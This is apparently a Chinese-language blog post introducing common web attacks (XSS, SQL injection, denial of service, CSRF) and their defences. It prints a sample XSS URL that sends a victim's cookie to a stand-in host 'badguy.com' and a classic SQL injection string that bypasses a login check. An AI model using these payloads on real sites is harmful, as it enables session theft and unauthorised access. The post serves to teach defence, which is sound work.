web 安全领域的一些常见攻防

搞web离不开security这个话题，以前关注的也很少只是据说一些名词什么的。是时候好好看看这些安全问题了。根据Cenzic 2012年的报告看一下都有哪些常见攻击。

37%    Cross-site scripting
16%    SQL injection
5%    Path disclosure
5%    Denial-of-service attack
4%    Arbitrary code execution
4%    Memory corruption
4%    Cross-site request forgery
3%    Data breach (information disclosure)
3%    Arbitrary file inclusion
2%    Local file inclusion
1%    Remote file inclusion
1%    Buffer overflow
15%    Other, including code injection (PHP/JavaScript), etc.

排好队先看几个我接触过的。

cross site script (XSS)

什么是XSS

XSS指攻击者在网页中嵌入客户端脚本(例如JavaScript), 用户浏览网页就会触发恶意脚本执行。 好比获取用户的Cookie，导航到恶意网站,携带木马等。如何把恶意代码嵌入到用户要访问的网页中，攻击者挖空心思各出奇招了。通常会有这两类方式：

• Reflected (non-persistent)
  反射攻击，就是恶意代码藏在本地，表现方式多是一个恶意连接，你点击后给server GET/POST这个request，server若是没有恰当的处理这个请求，恶意代码返回给用户浏览器并执行。举个例子就比较明白了。来自Web安全测试之XSS

有这么个网页，查询的结果和查询的关键字都会显示到网页上。

<html>
　　<title></title>
　　　　<body>
　　　　　　　　Results  for  <%Reequest.QueryString("term")%>
　　　　　　　　...
　　　　</body>
</html>

Tom 先创建一个网站http://badguy.com, 用来接收“偷”来的信息。而后Tom 构造一个恶意的url(以下), 经过某种方式(邮件，QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL， 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

XSS防治之道

1. 文本输入作中对js关键字作编码，让回给用户浏览器的js不可执行

2. 浏览器的同源策略，浏览器只容许访问cookie的IP+port必须同最初建立cookie的ip+port相同

3. web app或者浏览器提供“禁用script”的选项

SQL injection

什么是SQL 注入

SQL注入攻击是黑客对数据库进行攻击的经常使用手段之一。至关大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户能够提交一段数据库查询代码，根据程序返回的结果，得到某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

某个网站的登陆验证的SQL查询代码为：

strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"

恶意填入

userName = "1' OR '1'='1"; 与passWord = "1' OR '1'='1";

将致使本来的SQL字符串被填为

strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"

也就是实际上运行的SQL命令会变成下面这样的

strSQL = "SELECT * FROM users;"

所以达到无帐号密码，亦可登陆网站。因此SQL注入攻击被俗称为黑客的填空游戏。

SQL injection 防治之道

从安全技术手段上来讲，能够经过数据库防火墙实现对SQL注入攻击的防范，由于SQL注入攻击每每是经过应用程序来进攻，可使用虚拟补丁技术实现对注入攻击的SQL特征识别，实现实时攻击阻断。

Denial-of-service

顾名思义，拒绝服务攻击就是想尽办法让你的服务器没法正常提供服务。方法太多了，可是仔细研究攻击的模式，能够分为如下四种状况：

　　a.消耗包括网络带宽、存储空间、CPU 时间等资源；

　　b.破坏或者更改配置信息；

　　C.物理破坏或者改变网络部件；

　　d.利用服务程序中的处理错误使服务失效
若是攻击者使用分布在各地的PC来发起攻击，这就是DDOS了，distributed DOS。有关如何防治DDOS，没有太好的办法，转一个知乎上的讨论，知乎讨论DDOS

Cross-site request forgery

跨站请求伪造也被称为 one-click attack 或者 session riding，一般缩写为 CSRF 或者 XSRF， 是一种挟制用户在当前已登陆的Web应用程序上执行非本意的操做的攻击方法。跟跨網站指令碼（XSS）相比，XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户网页浏览器的信任。你这能够这么理解CSRF攻击：攻击者盗用了你的身份，以你的名义发送恶意请求。浅谈CSRF攻击方式 有个不错的例子描述，一目了然。

防护 CSRF 攻击策略

1. 验证 HTTP Referer 字段
   HTTP头里有Referer字段，这个字段用以标识请求来源地址。在处理敏感信息时，一般來说Referer字段应和请求的地址位于同一域名下。好比银行页面上的转帐连接http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName，Referer字段地址一般应该位于www.examplebank.com之下，也就是这个连接必须是这个网站域名下面的网页提供的。而若是是CSRF攻击的请求通常是其余恶意网站的网页，浏览器填Referer字段时会填恶意网站的地址，不会位于www.examplebank.com之下，这时候server端能够识别出恶意访问。

2. 在请求地址中添加 token 并验证
   只要server端能够识别出发来的请求不是来自server本身提供的网页上的连接，server就能识别这不是我容许的请求，肯能是CSRF假装的请求。若是标识这些敏感请求呢？server能够在这个连接旁边附带一个随机码（csrf token），若是你是正常访问天然能够带上来正确的csrf token，不然就是其余恶意访问了。

安全是个大领域，暂时先到这里，之后有时间再总结写别的。

Web_application_security
Web Application Security
Web安全测试之XSS
拒绝服务攻击
知乎讨论DDOS
浅谈CSRF攻击方式